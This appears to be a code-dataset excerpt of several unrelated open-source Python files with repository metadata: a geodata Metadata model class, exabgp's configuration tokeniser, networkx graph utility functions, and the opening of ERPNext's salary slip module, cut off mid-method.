"""
self._contacts = contacts
# coordinateSystem
@property
def coordinateSystem(self) -> dict:
"""Gets the coordinateSystem of this Metadata.
:return: The coordinateSystem of this Metadata.
:rtype: dict
"""
return self._coordinateSystem
@coordinateSystem.setter
def coordinateSystem(self, coordinateSystem: dict):
"""Sets the coordinate systems of this Metadata.
:param dict coordinateSystem: to be set
"""
self._coordinateSystem = coordinateSystem
# created
@property
def created(self) -> str:
"""Gets the creation date of the data described by the Metadata.
It's the equivalent of the `created` original attribute (renamed to avoid conflicts with the _created` one).
Date format is: `%Y-%m-%dT%H:%M:%S+00:00`.
:return: The creation of this Metadata.
:rtype: str
"""
return self._creation
# distance
@property
def distance(self) -> str:
"""Gets the distance of this Metadata.
:return: The distance of this Metadata.
:rtype: str
"""
return self._distance
@distance.setter
def distance(self, distance: str):
"""Sets the of this Metadata.
:param str distance: to be set
"""
self._distance = distance
# editionProfile
@property
def editionProfile(self) -> str:
"""Gets the editionProfile of this Metadata.
:return: The editionProfile of this Metadata.
:rtype: str
"""
return self._editionProfile
@editionProfile.setter
def editionProfile(self, editionProfile: str):
"""Sets the of this Metadata.
:param str editionProfile: to be set
"""
self._editionProfile = editionProfile
# encoding
@property
def encoding(self) -> str:
"""Gets the encoding of this Metadata.
:return: The encoding of this Metadata.
:rtype: str
"""
return self._encoding
@encoding.setter
def encoding(self, encoding: str):
"""Sets the of this Metadata.
:param str encoding: to be set
"""
self._encoding = encoding
# envelope
@property
def envelope(self) -> str:
"""Gets the envelope of this Metadata.
:return: The envelope of this Metadata.
:rtype: str
"""
return self._envelope
@envelope.setter
def envelope(self, envelope: str):
"""Sets the of this Metadata.
:param str envelope: to be set
"""
self._envelope = envelope
# events
@property
def events(self) -> list:
"""Gets the events of this Metadata.
:return: The events of this Metadata.
:rtype: list
"""
return self._events
@events.setter
def events(self, events: list):
"""Sets the of this Metadata.
:param list events: to be set
"""
self._events = events
# featureAttributes
@property
def featureAttributes(self) -> list:
"""Gets the featureAttributes of this Metadata.
:return: The featureAttributes of this Metadata.
:rtype: list
"""
return self._featureAttributes
@featureAttributes.setter
def featureAttributes(self, featureAttributes: list):
"""Sets the of this Metadata.
:param list featureAttributes: to be set
"""
self._featureAttributes = featureAttributes
# features
@property
def features(self) -> int:
"""Gets the features of this Metadata.
:return: The features of this Metadata.
:rtype: int
"""
return self._features
@features.setter
def features(self, features: int):
"""Sets the of this Metadata.
:param int features: to be set
"""
self._features = features
# format
@property
def format(self) -> str:
"""Gets the format of this Metadata.
:return: The format of this Metadata.
:rtype: str
"""
return self._format
@format.setter
def format(self, format: str):
"""Sets the of this Metadata.
:param str format: to be set
"""
self._format = format
# formatVersion
@property
def formatVersion(self) -> str:
"""Gets the formatVersion of this Metadata.
:return: The formatVersion of this Metadata.
:rtype: str
"""
return self._formatVersion
@formatVersion.setter
def formatVersion(self, formatVersion: str):
"""Sets the of this Metadata.
:param str formatVersion: to be set
"""
self._formatVersion = formatVersion
# geometry
@property
def geometry(self) -> str:
"""Gets the geometry of this Metadata.
:return: The geometry of this Metadata.
:rtype: str
"""
return self._geometry
@geometry.setter
def geometry(self, geometry: str):
"""Sets the of this Metadata.
:param str geometry: to be set
"""
self._geometry = geometry
# keywords
@property
def keywords(self) -> str:
"""Gets the keywords of this Metadata.
:return: The keywords of this Metadata.
:rtype: str
"""
return self._keywords
@keywords.setter
def keywords(self, keywords: str):
"""Sets the of this Metadata.
:param str keywords: to be set
"""
self._keywords = keywords
# language
@property
def language(self) -> str:
"""Gets the language of this Metadata.
:return: The language of this Metadata.
:rtype: str
"""
return self._language
@language.setter
def language(self, language: str):
"""Sets the of this Metadata.
:param str language: to be set
"""
self._language = language
# layers
@property
def layers(self) -> list:
"""Gets the layers of this Metadata.
:return: The layers of this Metadata.
:rtype: list
"""
return self._layers
@layers.setter
def layers(self, layers: list):
"""Sets the of this Metadata.
:param list layers: to be set
"""
self._layers = layers
# limitations
@property
def limitations(self) -> str:
"""Gets the limitations of this Metadata.
:return: The limitations of this Metadata.
:rtype: str
"""
return self._limitations
@limitations.setter
def limitations(self, limitations: str):
"""Sets the of this Metadata.
:param str limitations: to be set
"""
self._limitations = limitations
# links
@property
def links(self) -> str:
"""Gets the links of this Metadata.
:return: The links of this Metadata.
:rtype: str
"""
return self._links
@links.setter
def links(self, links: str):
"""Sets the of this Metadata.
:param str links: to be set
"""
self._links = links
# modification
@property
def modified(self) -> str:
"""Gets the last modification date of the data described by this Metadata.
It's the equivalent of the `created` original attribute (renamed to avoid conflicts with the _created` one).
:return: The modification of this Metadata.
:rtype: str
"""
return self._modification
# name
@property
def name(self) -> str:
"""Gets the name of this Metadata.
:return: The name of this Metadata.
:rtype: str
"""
return self._name
@name.setter
def name(self, name: str):
"""Sets technical name of the Metadata.
:param str name: technical name this Metadata.
"""
self._name = name
# operations
@property
def operations(self) -> list:
"""Gets the operations of this Metadata.
:return: The operations of this Metadata.
:rtype: list
"""
return self._operations
@operations.setter
def operations(self, operations: list):
"""Sets the of this Metadata.
:param list operations: to be set
"""
self._operations = operations
# path
@property
def path(self) -> str:
"""Gets the path of this Metadata.
:return: The path of this Metadata.
:rtype: str
"""
return self._path
@path.setter
def path(self, path: str):
"""Sets the of this Metadata.
:param str path: to be set
"""
self._path = path
# precision
@property
def precision(self) -> str:
"""Gets the precision of this Metadata.
:return: The precision of this Metadata.
:rtype: str
"""
return self._precision
@precision.setter
def precision(self, precision: str):
"""Sets the of this Metadata.
:param str precision: to be set
"""
self._precision = precision
# published
@property
def published(self) -> str:
"""Gets the published of this Metadata.
:return: The published of this Metadata.
:rtype: str
"""
return self._published
@published.setter
def published(self, published: str):
"""Sets the of this Metadata.
:param str published: to be set
"""
self._published = published
# scale
@property
def scale(self) -> str:
"""Gets the scale of this Metadata.
:return: The scale of this Metadata.
:rtype: str
"""
return self._scale
@scale.setter
def scale(self, scale: str):
"""Sets the of this Metadata.
:param str scale: to be set
"""
self._scale = scale
# series
@property
def series(self) -> str:
"""Gets the series of this Metadata.
:return: The series of this Metadata.
:rtype: str
"""
return self._series
@series.setter
def series(self, series: str):
"""Sets the of this Metadata.
:param str series: to be set
"""
self._series = series
# serviceLayers
@property
def serviceLayers(self) -> list:
"""Gets the serviceLayers of this Metadata.
:return: The serviceLayers of this Metadata.
:rtype: list
"""
return self._serviceLayers
@serviceLayers.setter
def serviceLayers(self, serviceLayers: list):
"""Sets the of this Metadata.
:param list serviceLayers: to be set
"""
self._serviceLayers = serviceLayers
# specifications
@property
def specifications(self) -> str:
"""Gets the specifications of this Metadata.
:return: The specifications of this Metadata.
:rtype: str
"""
return self._specifications
@specifications.setter
def specifications(self, specifications: str):
"""Sets the of this Metadata.
:param str specifications: to be set
"""
self._specifications = specifications
# tags
@property
def tags(self) -> str:
"""Gets the tags of this Metadata.
:return: The tags of this Metadata.
:rtype: str
"""
return self._tags
@tags.setter
def tags(self, tags: str):
"""Sets the of this Metadata.
:param str tags: to be set
"""
self._tags = tags
# title
@property
def title(self) -> str:
"""Gets the title of this Metadata.
:return: The title of this Metadata.
:rtype: str
"""
return self._title
@title.setter
def title(self, title: str):
"""Sets the of this Metadata.
:param str title: to be set
"""
self._title = title
# topologicalConsistency
@property
def topologicalConsistency(self) -> str:
"""Gets the topologicalConsistency of this Metadata.
:return: The topologicalConsistency of this Metadata.
:rtype: str
"""
return self._topologicalConsistency
@topologicalConsistency.setter
def topologicalConsistency(self, topologicalConsistency: str):
"""Sets the of this Metadata.
:param str topologicalConsistency: to be set
"""
self._topologicalConsistency = topologicalConsistency
# type
@property
def type(self) -> str:
"""Gets the type of this Metadata.
:return: The type of this Metadata.
:rtype: str
"""
return self._type
@type.setter
def type(self, type: str):
"""Sets the type of this Metadata.
:param str type: The type of this Metadata.
"""
# check type value
if type not in MetadataTypes.__members__:
raise ValueError(
"Metadata type '{}' is not an accepted value. Must be one of: {}.".format(
type, " | ".join([e.name for e in MetadataTypes])
)
)
self._type = type
# updateFrequency
@property
def updateFrequency(self) -> str:
"""Gets the updateFrequency of this Metadata.
:return: The updateFrequency of this Metadata.
:rtype: str
"""
return self._updateFrequency
@updateFrequency.setter
def updateFrequency(self, updateFrequency: str):
"""Sets the of this Metadata.
:param str updateFrequency: to be set
"""
self._updateFrequency = updateFrequency
# validFrom
@property
def validFrom(self) -> str:
"""Gets the validFrom of this Metadata.
:return: The validFrom of this Metadata.
:rtype: str
"""
return self._validFrom
@validFrom.setter
def validFrom(self, validFrom: str):
"""Sets the of this Metadata.
:param str validFrom: to be set
"""
self._validFrom = validFrom
# validTo
@property
def validTo(self) -> str:
"""Gets the validTo of this Metadata.
:return: The validTo of this Metadata.
:rtype: str
"""
return self._validTo
@validTo.setter
def validTo(self, validTo: str):
"""Sets the of this Metadata.
:param str validTo: to be set
"""
self._validTo = validTo
# validityComment
@property
def validityComment(self) -> str:
"""Gets the validityComment of this Metadata.
:return: The validityComment of this Metadata.
:rtype: str
"""
return self._validityComment
@validityComment.setter
def validityComment(self, validityComment: str):
"""Sets the of this Metadata.
:param str validityComment: to be set
"""
self._validityComment = validityComment
# -- SPECIFIC TO IMPLEMENTATION ----------------------------------------------------
@property
def groupName(self) -> str:
"""Shortcut to get the name of the workgroup which owns the Metadata."""
if isinstance(self._creator, dict):
return self._creator.get("contact").get("name")
elif isinstance(self._creator, Workgroup):
return self._creator.contact.get("name")
else:
return None
@property
def groupId(self) -> str:
"""Shortcut to get the UUID of the workgroup which owns the Metadata."""
if isinstance(self._creator, dict):
return self._creator.get("_id")
elif isinstance(self._creator, Workgroup):
return self._creator._id
else:
return None
# -- METHODS -----------------------------------------------------------------------
def admin_url(self, url_base: str = "https://app.isogeo.com") -> str:
"""Returns the administration URL (https://app.isogeo.com) for this metadata.
:param str url_base: base URL of admin site. Defaults to: https://app.isogeo.com
:rtype: str
"""
if self._creator is None:
logger.warning("Creator is required to build admin URL")
return False
creator_id = self._creator.get("_id")
return "{}/groups/{}/resources/{}/".format(url_base, creator_id, self._id)
def title_or_name(self, slugged: bool = False) -> str:
"""Gets the title of this Metadata or the name if there is no title.
It can return a slugified value.
:param bool slugged: slugify title. Defaults to `False`.
:returns: the title or the name of this Metadata.
:rtype: str
"""
if self._title:
title_or_name = self._title
else:
title_or_name = self._name
# slugify
if slugged:
title_or_name = (
unicodedata.normalize("NFKD", title_or_name)
.encode("ascii", "ignore")
.decode("ascii")
)
title_or_name = _regex_slugify_strip.sub("", title_or_name).strip().lower()
title_or_name = _regex_slugify_hyphenate.sub("-", title_or_name)
return title_or_name
def to_dict(self) -> dict:
"""Returns the model properties as a dict"""
result = {}
for attr, _ in self.ATTR_TYPES.items():
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
if issubclass(Metadata, dict):
for key, value in self.items():
result[key] = value
return result
def to_dict_creation(self) -> dict:
"""Returns the model properties as a dict structured for creation purpose (POST)"""
result = {}
for attr, _ in self.ATTR_CREA.items():
# get attribute value
value = getattr(self, attr)
# switch attribute name for creation purpose
if attr in self.ATTR_MAP:
attr = self.ATTR_MAP.get(attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
if issubclass(Metadata, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self) -> str:
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self) -> str:
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other) -> bool:
"""Returns true if both objects are equal"""
if not isinstance(other, Metadata):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other) -> bool:
"""Returns true if both objects are not equal"""
return not self == other
# ##############################################################################
# ##### Stand alone program ########
# ##################################
if __name__ == "__main__":
""" standalone execution """
md = Metadata()
print(md)
|
gpl-3.0
| 639,171,598,854,724,600
| 26.235252
| 116
| 0.522886
| false
| 4.686888
| false
| false
| false
|
lochiiconnectivity/exabgp
|
lib/exabgp/configuration/engine/tokeniser.py
|
1
|
3330
|
# encoding: utf-8
"""
tokeniser.py
Created by Thomas Mangin on 2014-06-22.
Copyright (c) 2014-2015 Exa Networks. All rights reserved.
"""
from exabgp.util import coroutine
from exabgp.configuration.engine.location import Location
from exabgp.configuration.engine.raised import Raised
# convert special caracters
@coroutine.join
def unescape (s):
start = 0
while start < len(s):
pos = s.find('\\', start)
if pos == -1:
yield s[start:]
break
yield s[start:pos]
pos += 1
esc = s[pos]
if esc == 'b':
yield '\b'
elif esc == 'f':
yield '\f'
elif esc == 'n':
yield '\n'
elif esc == 'r':
yield '\r'
elif esc == 't':
yield '\t'
elif esc == 'u':
yield chr(int(s[pos + 1:pos + 5], 16))
pos += 4
else:
yield esc
start = pos + 1
# A coroutine which return the producer token, or string if quoted from the stream
@coroutine.each
def tokens (stream):
spaces = [' ','\t','\r','\n']
strings = ['"', "'"]
syntax = [',','[',']','{','}']
comment = ['#',]
nb_lines = 0
for line in stream:
nb_lines += 1
nb_chars = 0
quoted = ''
word = ''
for char in line:
if char in comment:
if quoted:
word += char
nb_chars += 1
else:
if word:
yield nb_lines,nb_chars,line,char
word = ''
break
elif char in syntax:
if quoted:
word += char
else:
if word:
yield nb_lines,nb_chars-len(word),line,word
word = ''
yield nb_lines,nb_chars,line,char
nb_chars += 1
elif char in spaces:
if quoted:
word += char
elif word:
yield nb_lines,nb_chars-len(word),line,word
word = ''
nb_chars += 1
elif char in strings:
word += char
if quoted == char:
quoted = ''
yield nb_lines,nb_chars-len(word),line,word
word = ''
else:
quoted = char
nb_chars += 1
else:
word += char
nb_chars += 1
# ==================================================================== Tokeniser
# Return the producer token from the configuration
class Tokeniser (Location):
def __init__ (self,name,stream):
super(Tokeniser,self).__init__()
self.name = name # A unique name for this tokenier, so we can have multiple
self.tokeniser = tokens(stream) # A corouting giving us the producer toker
self._rewind = [] # Should we want to rewind, the list of to pop first
def __call__ (self):
if self._rewind:
return self._rewind.pop()
token = self.content(self.tokeniser)
return token
# XXX: FIXME: line and position only work if we only rewind one element
def rewind (self,token):
self._rewind.append(token)
def content (self,producer):
try:
while True:
self.idx_line,self.idx_column,self.line,token = producer()
if token == '[':
returned = []
for token in self.iterate_list(producer):
returned.append((self.idx_line,self.idx_column,self.line,token))
return returned
elif token[0] in ('"',"'"):
return unescape(token[1:-1])
else:
return token
except ValueError:
raise Raised(Location(self.idx_line,self.idx_column,self.line),'Could not parse %s' % str(token))
except StopIteration:
return None
def iterate_list (self,producer):
token = self.content(producer)
while token and token != ']':
yield token
token = self.content(producer)
|
bsd-3-clause
| -4,720,082,603,888,199,000
| 22.125
| 100
| 0.597297
| false
| 3.094796
| false
| false
| false
|
tmilicic/networkx
|
networkx/classes/function.py
|
1
|
16409
|
"""Functional interface to graph methods and assorted utilities.
"""
# Copyright (C) 2004-2015 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
#
import networkx as nx
from networkx.utils import not_implemented_for
import itertools
__author__ = """\n""".join(['Aric Hagberg (hagberg@lanl.gov)',
'Pieter Swart (swart@lanl.gov)',
'Dan Schult(dschult@colgate.edu)'])
__all__ = ['nodes', 'edges', 'degree', 'degree_histogram', 'neighbors',
'number_of_nodes', 'number_of_edges', 'density',
'is_directed', 'info', 'freeze', 'is_frozen', 'subgraph',
'create_empty_copy', 'set_node_attributes',
'get_node_attributes', 'set_edge_attributes',
'get_edge_attributes', 'all_neighbors', 'non_neighbors',
'non_edges', 'common_neighbors', 'is_weighted',
'is_negatively_weighted', 'is_empty']
def nodes(G):
"""Return an iterator over the graph nodes."""
return G.nodes()
def edges(G,nbunch=None):
"""Return iterator over edges incident to nodes in nbunch.
Return all edges if nbunch is unspecified or nbunch=None.
For digraphs, edges=out_edges
"""
return G.edges(nbunch)
def degree(G,nbunch=None,weight=None):
"""Return degree of single node or of nbunch of nodes.
If nbunch is ommitted, then return degrees of *all* nodes.
"""
return G.degree(nbunch,weight)
def neighbors(G,n):
"""Return a list of nodes connected to node n. """
return G.neighbors(n)
def number_of_nodes(G):
"""Return the number of nodes in the graph."""
return G.number_of_nodes()
def number_of_edges(G):
"""Return the number of edges in the graph. """
return G.number_of_edges()
def density(G):
r"""Return the density of a graph.
The density for undirected graphs is
.. math::
d = \frac{2m}{n(n-1)},
and for directed graphs is
.. math::
d = \frac{m}{n(n-1)},
where `n` is the number of nodes and `m` is the number of edges in `G`.
Notes
-----
The density is 0 for a graph without edges and 1 for a complete graph.
The density of multigraphs can be higher than 1.
Self loops are counted in the total number of edges so graphs with self
loops can have density higher than 1.
"""
n=number_of_nodes(G)
m=number_of_edges(G)
if m==0 or n <= 1:
d=0.0
else:
if G.is_directed():
d=m/float(n*(n-1))
else:
d= m*2.0/float(n*(n-1))
return d
def degree_histogram(G):
"""Return a list of the frequency of each degree value.
Parameters
----------
G : Networkx graph
A graph
Returns
-------
hist : list
A list of frequencies of degrees.
The degree values are the index in the list.
Notes
-----
Note: the bins are width one, hence len(list) can be large
(Order(number_of_edges))
"""
# We need to make degseq list because we call it twice.
degseq = list(d for n, d in G.degree())
dmax = max(degseq) + 1
freq = [ 0 for d in range(dmax) ]
for d in degseq:
freq[d] += 1
return freq
def is_directed(G):
""" Return True if graph is directed."""
return G.is_directed()
def frozen(*args):
"""Dummy method for raising errors when trying to modify frozen graphs"""
raise nx.NetworkXError("Frozen graph can't be modified")
def freeze(G):
"""Modify graph to prevent further change by adding or removing
nodes or edges.
Node and edge data can still be modified.
Parameters
----------
G : graph
A NetworkX graph
Examples
--------
>>> G=nx.Graph()
>>> G.add_path([0,1,2,3])
>>> G=nx.freeze(G)
>>> try:
... G.add_edge(4,5)
... except nx.NetworkXError as e:
... print(str(e))
Frozen graph can't be modified
Notes
-----
To "unfreeze" a graph you must make a copy by creating a new graph object:
>>> graph = nx.path_graph(4)
>>> frozen_graph = nx.freeze(graph)
>>> unfrozen_graph = nx.Graph(frozen_graph)
>>> nx.is_frozen(unfrozen_graph)
False
See Also
--------
is_frozen
"""
G.add_node=frozen
G.add_nodes_from=frozen
G.remove_node=frozen
G.remove_nodes_from=frozen
G.add_edge=frozen
G.add_edges_from=frozen
G.remove_edge=frozen
G.remove_edges_from=frozen
G.clear=frozen
G.frozen=True
return G
def is_frozen(G):
"""Return True if graph is frozen.
Parameters
----------
G : graph
A NetworkX graph
See Also
--------
freeze
"""
try:
return G.frozen
except AttributeError:
return False
def subgraph(G, nbunch):
"""Return the subgraph induced on nodes in nbunch.
Parameters
----------
G : graph
A NetworkX graph
nbunch : list, iterable
A container of nodes that will be iterated through once (thus
it should be an iterator or be iterable). Each element of the
container should be a valid node type: any hashable type except
None. If nbunch is None, return all edges data in the graph.
Nodes in nbunch that are not in the graph will be (quietly)
ignored.
Notes
-----
subgraph(G) calls G.subgraph()
"""
return G.subgraph(nbunch)
def create_empty_copy(G,with_nodes=True):
"""Return a copy of the graph G with all of the edges removed.
Parameters
----------
G : graph
A NetworkX graph
with_nodes : bool (default=True)
Include nodes.
Notes
-----
Graph, node, and edge data is not propagated to the new graph.
"""
H=G.__class__()
if with_nodes:
H.add_nodes_from(G)
return H
def info(G, n=None):
"""Print short summary of information for the graph G or the node n.
Parameters
----------
G : Networkx graph
A graph
n : node (any hashable)
A node in the graph G
"""
info='' # append this all to a string
if n is None:
info+="Name: %s\n"%G.name
type_name = [type(G).__name__]
info+="Type: %s\n"%",".join(type_name)
info+="Number of nodes: %d\n"%G.number_of_nodes()
info+="Number of edges: %d\n"%G.number_of_edges()
nnodes=G.number_of_nodes()
if len(G) > 0:
if G.is_directed():
info+="Average in degree: %8.4f\n"%\
(sum(d for n, d in G.in_degree())/float(nnodes))
info+="Average out degree: %8.4f"%\
(sum(d for n, d in G.out_degree())/float(nnodes))
else:
s=sum(dict(G.degree()).values())
info+="Average degree: %8.4f"%\
(float(s)/float(nnodes))
else:
if n not in G:
raise nx.NetworkXError("node %s not in graph"%(n,))
info+="Node % s has the following properties:\n"%n
info+="Degree: %d\n"%G.degree(n)
info+="Neighbors: "
info+=' '.join(str(nbr) for nbr in G.neighbors(n))
return info
def set_node_attributes(G, name, values):
"""Set node attributes from dictionary of nodes and values
Parameters
----------
G : NetworkX Graph
name : string
Attribute name
values: dict
Dictionary of attribute values keyed by node. If `values` is not a
dictionary, then it is treated as a single attribute value that is then
applied to every node in `G`.
Examples
--------
>>> G = nx.path_graph(3)
>>> bb = nx.betweenness_centrality(G)
>>> nx.set_node_attributes(G, 'betweenness', bb)
>>> G.node[1]['betweenness']
1.0
"""
try:
values.items
except AttributeError:
# Treat `value` as the attribute value for each node.
values = dict(zip(G.nodes(), [values] * len(G)))
for node, value in values.items():
G.node[node][name] = value
def get_node_attributes(G, name):
"""Get node attributes from graph
Parameters
----------
G : NetworkX Graph
name : string
Attribute name
Returns
-------
Dictionary of attributes keyed by node.
Examples
--------
>>> G=nx.Graph()
>>> G.add_nodes_from([1,2,3],color='red')
>>> color=nx.get_node_attributes(G,'color')
>>> color[1]
'red'
"""
return dict( (n,d[name]) for n,d in G.node.items() if name in d)
def set_edge_attributes(G, name, values):
"""Set edge attributes from dictionary of edge tuples and values.
Parameters
----------
G : NetworkX Graph
name : string
Attribute name
values : dict
Dictionary of attribute values keyed by edge (tuple). For multigraphs,
the keys tuples must be of the form (u, v, key). For non-multigraphs,
the keys must be tuples of the form (u, v). If `values` is not a
dictionary, then it is treated as a single attribute value that is then
applied to every edge in `G`.
Examples
--------
>>> G = nx.path_graph(3)
>>> bb = nx.edge_betweenness_centrality(G, normalized=False)
>>> nx.set_edge_attributes(G, 'betweenness', bb)
>>> G[1][2]['betweenness']
2.0
"""
try:
values.items
except AttributeError:
# Treat `value` as the attribute value for each edge.
if G.is_multigraph():
edges = list(G.edges(keys=True))
else:
edges = list(G.edges())
values = dict(zip(edges, [values] * len(list(edges))))
if G.is_multigraph():
for (u, v, key), value in values.items():
G[u][v][key][name] = value
else:
for (u, v), value in values.items():
G[u][v][name] = value
def get_edge_attributes(G, name):
"""Get edge attributes from graph
Parameters
----------
G : NetworkX Graph
name : string
Attribute name
Returns
-------
Dictionary of attributes keyed by edge. For (di)graphs, the keys are
2-tuples of the form: (u,v). For multi(di)graphs, the keys are 3-tuples of
the form: (u, v, key).
Examples
--------
>>> G=nx.Graph()
>>> G.add_path([1,2,3],color='red')
>>> color=nx.get_edge_attributes(G,'color')
>>> color[(1,2)]
'red'
"""
if G.is_multigraph():
edges = G.edges(keys=True, data=True)
else:
edges = G.edges(data=True)
return dict( (x[:-1], x[-1][name]) for x in edges if name in x[-1] )
def all_neighbors(graph, node):
""" Returns all of the neighbors of a node in the graph.
If the graph is directed returns predecessors as well as successors.
Parameters
----------
graph : NetworkX graph
Graph to find neighbors.
node : node
The node whose neighbors will be returned.
Returns
-------
neighbors : iterator
Iterator of neighbors
"""
if graph.is_directed():
values = itertools.chain.from_iterable([graph.predecessors(node),
graph.successors(node)])
else:
values = graph.neighbors(node)
return values
def non_neighbors(graph, node):
"""Returns the non-neighbors of the node in the graph.
Parameters
----------
graph : NetworkX graph
Graph to find neighbors.
node : node
The node whose neighbors will be returned.
Returns
-------
non_neighbors : iterator
Iterator of nodes in the graph that are not neighbors of the node.
"""
nbors = set(neighbors(graph, node)) | set([node])
return (nnode for nnode in graph if nnode not in nbors)
def non_edges(graph):
"""Returns the non-existent edges in the graph.
Parameters
----------
graph : NetworkX graph.
Graph to find non-existent edges.
Returns
-------
non_edges : iterator
Iterator of edges that are not in the graph.
"""
if graph.is_directed():
for u in graph.nodes():
for v in non_neighbors(graph, u):
yield (u, v)
else:
nodes = set(graph)
while nodes:
u = nodes.pop()
for v in nodes - set(graph[u]):
yield (u, v)
@not_implemented_for('directed')
def common_neighbors(G, u, v):
"""Return the common neighbors of two nodes in a graph.
Parameters
----------
G : graph
A NetworkX undirected graph.
u, v : nodes
Nodes in the graph.
Returns
-------
cnbors : iterator
Iterator of common neighbors of u and v in the graph.
Raises
------
NetworkXError
If u or v is not a node in the graph.
Examples
--------
>>> G = nx.complete_graph(5)
>>> sorted(nx.common_neighbors(G, 0, 1))
[2, 3, 4]
"""
if u not in G:
raise nx.NetworkXError('u is not in the graph.')
if v not in G:
raise nx.NetworkXError('v is not in the graph.')
# Return a generator explicitly instead of yielding so that the above
# checks are executed eagerly.
return (w for w in G[u] if w in G[v] and w not in (u, v))
def is_weighted(G, edge=None, weight='weight'):
"""Returns ``True`` if ``G`` has weighted edges.
Parameters
----------
G : graph
A NetworkX graph.
edge : tuple, optional
A 2-tuple specifying the only edge in ``G`` that will be tested. If
``None``, then every edge in ``G`` is tested.
weight: string, optional
The attribute name used to query for edge weights.
Returns
-------
bool
A boolean signifying if ``G``, or the specified edge, is weighted.
Raises
------
NetworkXError
If the specified edge does not exist.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.is_weighted(G)
False
>>> nx.is_weighted(G, (2, 3))
False
>>> G = nx.DiGraph()
>>> G.add_edge(1, 2, weight=1)
>>> nx.is_weighted(G)
True
"""
if edge is not None:
data = G.get_edge_data(*edge)
if data is None:
msg = 'Edge {!r} does not exist.'.format(edge)
raise nx.NetworkXError(msg)
return weight in data
if is_empty(G):
# Special handling required since: all([]) == True
return False
return all(weight in data for u, v, data in G.edges(data=True))
def is_negatively_weighted(G, edge=None, weight='weight'):
"""Returns ``True`` if ``G`` has negatively weighted edges.
Parameters
----------
G : graph
A NetworkX graph.
edge : tuple, optional
A 2-tuple specifying the only edge in ``G`` that will be tested. If
``None``, then every edge in ``G`` is tested.
weight: string, optional
The attribute name used to query for edge weights.
Returns
-------
bool
A boolean signifying if ``G``, or the specified edge, is negatively
weighted.
Raises
------
NetworkXError
If the specified edge does not exist.
Examples
--------
>>> G=nx.Graph()
>>> G.add_edges_from([(1, 3), (2, 4), (2, 6)])
>>> G.add_edge(1, 2, weight=4)
>>> nx.is_negatively_weighted(G, (1, 2))
False
>>> G[2][4]['weight'] = -2
>>> nx.is_negatively_weighted(G)
True
>>> G = nx.DiGraph()
>>> G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5), ('1', '0', -2)])
>>> nx.is_negatively_weighted(G)
True
"""
if edge is not None:
data = G.get_edge_data(*edge)
if data is None:
msg = 'Edge {!r} does not exist.'.format(edge)
raise nx.NetworkXError(msg)
return weight in data and data[weight] < 0
return any(weight in data and data[weight] < 0
for u, v, data in G.edges(data=True))
def is_empty(G):
"""Returns ``True`` if ``G`` has no edges.
Parameters
----------
G : graph
A NetworkX graph.
Returns
-------
bool
``True`` if ``G`` has no edges, and ``False`` otherwise.
Notes
-----
An empty graph can have nodes but not edges. The empty graph with zero
nodes is known as the null graph. This is an O(n) operation where n is the
number of nodes in the graph.
"""
return not any(G.adj.values())
|
bsd-3-clause
| -4,094,525,715,898,061,000
| 23.899848
| 82
| 0.566945
| false
| 3.7049
| false
| false
| false
|
ESS-LLP/erpnext-healthcare
|
erpnext/hr/doctype/salary_slip/salary_slip.py
|
1
|
34819
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, erpnext
import datetime
from frappe.utils import add_days, cint, cstr, flt, getdate, rounded, date_diff, money_in_words, getdate
from frappe.model.naming import make_autoname
from frappe import msgprint, _
from erpnext.hr.doctype.payroll_entry.payroll_entry import get_start_end_dates
from erpnext.hr.doctype.employee.employee import get_holiday_list_for_employee
from erpnext.utilities.transaction_base import TransactionBase
from frappe.utils.background_jobs import enqueue
from erpnext.hr.doctype.additional_salary.additional_salary import get_additional_salary_component
from erpnext.hr.utils import get_payroll_period
from erpnext.hr.doctype.employee_benefit_application.employee_benefit_application import get_benefit_component_amount
from erpnext.hr.doctype.employee_benefit_claim.employee_benefit_claim import get_benefit_claim_amount, get_last_payroll_period_benefits
class SalarySlip(TransactionBase):
def __init__(self, *args, **kwargs):
super(SalarySlip, self).__init__(*args, **kwargs)
self.series = 'Sal Slip/{0}/.#####'.format(self.employee)
self.whitelisted_globals = {
"int": int,
"float": float,
"long": int,
"round": round,
"date": datetime.date,
"getdate": getdate
}
def autoname(self):
self.name = make_autoname(self.series)
def validate(self):
self.status = self.get_status()
self.validate_dates()
self.check_existing()
if not self.salary_slip_based_on_timesheet:
self.get_date_details()
if not (len(self.get("earnings")) or len(self.get("deductions"))):
# get details from salary structure
self.get_emp_and_leave_details()
else:
self.get_leave_details(lwp = self.leave_without_pay)
# if self.salary_slip_based_on_timesheet or not self.net_pay:
self.calculate_net_pay()
company_currency = erpnext.get_company_currency(self.company)
self.total_in_words = money_in_words(self.rounded_total, company_currency)
if frappe.db.get_single_value("HR Settings", "max_working_hours_against_timesheet"):
max_working_hours = frappe.db.get_single_value("HR Settings", "max_working_hours_against_timesheet")
if self.salary_slip_based_on_timesheet and (self.total_working_hours > int(max_working_hours)):
frappe.msgprint(_("Total working hours should not be greater than max working hours {0}").
format(max_working_hours), alert=True)
def validate_dates(self):
if date_diff(self.end_date, self.start_date) < 0:
frappe.throw(_("To date cannot be before From date"))
def calculate_component_amounts(self):
if not getattr(self, '_salary_structure_doc', None):
self._salary_structure_doc = frappe.get_doc('Salary Structure', self.salary_structure)
data = self.get_data_for_eval()
